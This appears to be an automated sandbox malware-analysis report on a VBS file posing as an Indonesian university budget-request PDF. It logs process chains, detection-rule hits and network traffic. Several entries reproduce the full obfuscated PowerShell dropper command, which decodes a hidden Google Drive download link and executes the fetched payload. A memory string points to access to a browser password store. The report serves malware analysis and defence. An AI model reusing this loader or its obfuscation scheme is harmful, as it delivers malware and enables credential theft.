                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021193D15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195625000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021193D15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195625000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59083
                Source: unknownNetwork traffic detected: HTTP traffic on port 59082 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 59083 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59082
                Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.4:59082 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:59083 version: TLS 1.2

                System Summary

                barindex
                Source: amsi64_7408.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: amsi32_7784.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7408, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7784, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsneh
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsnehJump to behavior
                Source: PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7174
                Source: unknownProcess created: Commandline size = 7174
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7174Jump to behavior
                Source: amsi64_7408.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: amsi32_7784.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7408, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7784, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@8/10@5/5
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Reebok.DiaJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yl2fnnjw.zmj.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7408
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7784
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: msiexec.exe, 00000008.00000003.2158716208.000000001FAD5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbsReversingLabs: Detection: 18%
                Source: PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbsVirustotal: Detection: 20%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsneh
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsneh
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsnehJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
